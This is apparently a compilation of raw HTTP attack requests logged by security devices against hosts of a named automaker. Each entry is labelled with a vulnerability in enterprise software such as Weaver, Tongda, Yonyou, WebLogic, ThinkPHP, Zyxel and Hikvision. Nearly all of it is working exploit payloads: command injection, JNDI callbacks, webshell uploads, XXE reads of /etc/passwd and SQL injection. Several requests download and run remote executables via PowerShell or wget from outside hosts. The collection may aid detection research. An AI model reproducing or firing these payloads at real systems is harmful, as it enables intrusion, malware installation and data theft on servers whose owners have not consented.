Everything below consists of packets recorded in the back end of various security devices (no sensitive information is included; the attacks also failed in practice). The blank part at the end means this will continue to be updated (or possibly never be updated again).
=============================================================
Landray pre-authentication code execution vulnerability; this vulnerability is undisclosed (S3100028163)
POST /data/sys-common/treexml.tmpl HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)
Host:vpn.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:168
s_bean=ruleFormulaValidate&script=try {String cmd = "ping www.baidu.com";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}
=============================================================
FastJson exploitation attempt
POST / HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:application/json; charset=utf-8
Content-Length:115
{
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
"resourceName":"rmi://qNWA2Gls.dflqxk.ceye.io/Exploit"
}
===============================================================
fastjson(S2019010052)
POST / HTTP/1.1
User-Agent:Mozilla/5.0 (Windows NT 6.1; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Type:application/json; charset=utf-8
Content-Length:258
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://5ltnibIi.dflqxk.ceye.io/Exploit",
"autoCommit":true
}
}
==============================================================
eYou remote code execution (S3000009837)
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Host:test.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:25
type='|cat /etc/passwd||'
==============================================================
Qizhi bastion host SQL injection vulnerability
GET /audit/gui_detail_view.php?token=1&id=\&uid=,chr(97)) or 1: print chr(121)+chr(101)+chr(115)
#&login=shterm HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
Weaver OA E-cology file upload (/page/exportImport/uploadOperation.jsp)(S3100023488)
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Content-Length:288
--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="pwue.jsp"
Content-Type: application/octet-stream
<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--
==============================================================
Weaver OA9 pre-authentication arbitrary file upload (S3000009793)
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0)
Host:test.dongfeng-nissan.com.cn
Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Content-Length:288
--b0d829daa06c13d6b3e16b0ad21d1eed
Content-Disposition: form-data; name="file"; filename="pwue.jsp"
Content-Type: application/octet-stream
<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--b0d829daa06c13d6b3e16b0ad21d1eed--
==============================================================
Tongda OA v11.7 auth_mobi.php arbitrary user login vulnerability (S3100028588)
GET /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:test.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
Tongda OA file inclusion (S2020010015)
POST /ispirit/interface/gateway.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:43
json={"url":"/general/../../mysql5/my.ini"}
==============================================================
Tongda OA office system report_bi.func.php dataset_id parameter SQL injection vulnerability (S3100023434)
POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:113
_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
==============================================================
ThinkCMF arbitrary content inclusion vulnerability (S2020091501)
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
Host:202.96.191.173:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type:application/json
Accept-Encoding:gzip
Connection:close
==============================================================
Yonyou GRP-u8 SQL injection, allows command execution (S3000009903)
POST /Proxy HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:348
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
==============================================================
Ruijie EWEB remote code execution (S2120090999)
POST /guest_auth/guestIsUp.php HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:preview.dongfeng-nissan.com.cn
Content-Type:application/x-www-form-urlencoded
Content-Length:63
mac=1&ip=127.0.0.1|echo 'wkuqchdkhiuasborjbtn' > rqoojwfuwo.txt
==============================================================
Coremail disclosed vulnerability that allows reading the configuration directly (S2019010019)
GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:preview.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
ShopXO arbitrary file read vulnerability (CNVD-2021-15822)(S3100024378)
GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1
User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE)
Host:preview.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
Zyxel firewall command injection vulnerability (CVE-2022-30525)(S3100024936)
POST /ztp/cgi-bin/handler HTTP/1.1
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1
Host:vpn.dongfeng-nissan.com.cn
Content-Type:application/json
Content-Length:142
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl http://Z2i9EVbB.dflqxk.ceye.io;","data":"hi"}
==============================================================
WebLogic exploitation or scanning (D11236926c9)
GET /_async/AsyncResponseService HTTP/1.1
Host:erp-ct.dfsouth.com
User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept:*/*
Connection:keep-alive
==============================================================
Dynamicweb cloud e-commerce system unauthorized user creation vulnerability (CVE-2022-25369)
GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test HTTP/1.1
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
Host:vpn.dongfeng-nissan.com.cn
Content-Length:0
==============================================================
ThinkPHP 5.x remote code execution (S2020091901)
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
Host:202.96.191.161:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Encoding:gzip
Connection:close
==============================================================
Apache HTTP Server remote command execution (CVE-2021-41773)(S3000010931)
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host:202.96.191.161:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length:33
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip
Connection:close
==============================================================
XML external entity injection (D111751fdae)
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host:58.248.167.75:80
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length:314
Content-Type:application/xml
Accept-Encoding:gzip
Connection:close
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
==============================================================
WebLogic deserialization remote code execution vulnerability (CVE-2019-2725)(S2020041008)
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.232:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
cmd:powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe');start %SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe
Content-Length:206204
Host:202.96.191.232:7001
<?xml version="1.0" encoding="utf-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
--------------------------------------------------------------------------------------------------------
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:913
Host:202.96.191.185:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
----------------------------------------------------------------------------------
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:915
Host:202.96.191.185:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe');start %SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
==============================================================
WebLogic authorization bypass (CVE-2020-14883)(S2020102903)
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host:210.21.81.137:7001
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection:close
Content-Length:157
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip
_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://178.20.40.200/wbw.xml")
==============================================================
WebLogic deserialization remote code execution vulnerability (CVE-2017-10271)(S3000008711)
POST /_async/AsyncResponseService HTTP/1.1
Connection:Keep-Alive
Content-Type:text/xml; Charset=UTF-8
Accept:*/*
Accept-Language:zh-cn
Referer:http://202.96.191.185:7001/_async/AsyncResponseService
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Upgrade-Insecure-Requests:1
Content-Length:913
Host:202.96.191.185:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
==============================================================
Attack attempt against Hikvision using CVE-2021-36260 (S3000011160)
PUT /SDK/webLanguage HTTP/1.1
Host:202.96.191.232:81
User-Agent:Go-http-client/1.1
Content-Length:102
Accept:*/*
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,sv;q=0.8
Content-Type:application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With:XMLHttpRequest
<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp/ && cd /var/tmp/ && cd /var/run/)</language>
==============================================================
ThinkPHP remote code execution (S2020060403)
GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
Connection:Keep-Alive
Accept:*/*
Accept-Language:zh-cn
Referer:http://210.21.81.157:8087/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:210.21.81.157:8087
==============================================================
Elasticsearch unauthorized access (S3100024705)
GET /_cat/indices?format=json&h=index HTTP/1.1
Host:202.96.191.232:9200
Accept:*/*
Accept-Encoding:gzip, deflate, br
Connection:keep-alive
User-Agent:python-httpx/0.21.1
==============================================================
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API remote command execution (S3100024329)
POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding:identity
Content-Length:644
Accept-Language:en-us
Host:202.96.191.232:90
Accept:*/*
User-Agent:Mozila/5.0
Connection:close
Cache-Control:max-age=0
Content-Type:text/xml
Authorization:Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=
<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>
==============================================================
XXL-JOB unauthorized remote code execution vulnerability (S3100023062)
POST /run HTTP/1.1
Host:202.96.191.232:9999
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Content-Length:334
Accept:*/*
Accept-Language:en-US,en;q=0.5
Connection:close
Content-Type:application/json
Accept-Encoding:gzip
Connection:close
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "calc",
"glueUpdatetime": 1658940033024,
"broadcastIndex": 0,
"broadcastTotal": 0
}
==============================================================
Zhongyuan Qilin iAudit bastion host remote command execution vulnerability (get_luser_by_sshport.php)(S3100023318)
GET /get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20md5(ocuswpeelc);unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/ocuswpeelc.php;&clientport=1 HTTP/1.1
Host:210.21.81.165
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip
==============================================================
QiAnXin NS-NGFW (Wangkang) firewall pre-authentication remote code execution (S3000009856)
POST /directdata/direct/router HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Content-Length:200
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(tcynfdguxq);unlink(__FILE__);?>' >/var/www/html/tcynfdguxq.php"]}],"type":"rpc","tid":17}
==============================================================
Jenkins remote code execution (CVE-2019-1003000)(S2020070703)
GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27sqqx%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip
==============================================================
Detected SQL injection attack against Yonyou U8 OA test.jsp (S3000009930)
GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(204218669)) HTTP/1.1
Host:202.96.191.135
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36
Accept-Encoding:gzip
==============================================================
Yonyou Shikong KSOA pre-authentication file upload vulnerability; this vulnerability is undisclosed (S3100028170)
POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=9693326082.jsp HTTP/1.1
Host:mam.dongfeng-nissan.com.cn
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length:171
Accept:*/*
Connection:close
<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("OTY5MzMyNjA4Mg=="))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
==============================================================
Yonyou NC file upload vulnerability; at the time the detection was published the vulnerability was a 0day and no corresponding patch was found. (S3100029010)
POST /aim/equipmap/accept.jsp HTTP/1.1
Host:202.96.191.196
User-Agent:python-requests/2.28.0
Accept-Encoding:gzip, deflate
Accept:*/*
Connection:keep-alive
Content-Type:multipart/form-data; boundary=---------------------------16314487820932200903769468567
Content-Length:535
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="222222.txt"
Content-Type: text/plain
<%out.println("bea86d66a5278f9e6fa1112d2e2fcebf");%>
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"
\webapps
c_web80900fd668c51631353aca37fc1f829.jsp
-----------------------------16314487820932200903769468567--
==============================================================
Weaver E-office do_excel.php arbitrary file write vulnerability
PoC
POST /www/general/charge/charge_list/do_excel.php HTTP/1.1
Host:xxx.com
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length:34
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type:application/x-www-form-urlencoded
Referer:http://www.baidu.com/
Accept-Encoding:gzip
html=<?php system($_POST[pass]);?>
==============================================================
Weaver E-cology file upload vulnerability
Affected products: 8.0/9.0 below 10.47 and other versions
Exploitation status: exploited in the wild
Background: Weaver E-cology file upload vulnerability.
Vulnerability details: first send the upload packet
POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: target
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843
Accept-Encoding:gzip
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
Content-Length: 437
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="secId"
Content-Type: text/plain
1
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="Filedata"; filename="log.txt"
success
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="plandetailid"
1
-----------------------------34533880461293314163770424843--
Then write the file out under the website root path; replace fileid in the packet
POST /OfficeServer HTTP/1.1
Host: target
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843
Accept-Encoding:gzip
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close
Content-Length: 437
-----------------------------34533880461293314163770424843
Content-Disposition: form-data; name="success"
{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'1015543'}
-----------------------------34533880461293314163770424843--
==============================================================
(Suspected 0day) Yonyou NC 6.5 file upload vulnerability; at the time the detection was published the vulnerability was a 0day and no corresponding patch was found. (S3100029005)
POST /uapim/upload/grouptemplet?groupid=2&fileType=jsp HTTP/1.1
Host:202.96.191.196
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding:gzip, deflate
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Length:304
------WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Disposition: form-data; name="upload"; filename="whoami.jsp"
Content-Type: application/octet-stream
TEST123
------WebKitFormBoundarymMgLJdk18SQHBnpj
Content-Disposition: form-data; name="submit"
submit
------WebKitFormBoundarymMgLJdk18SQHBnpj--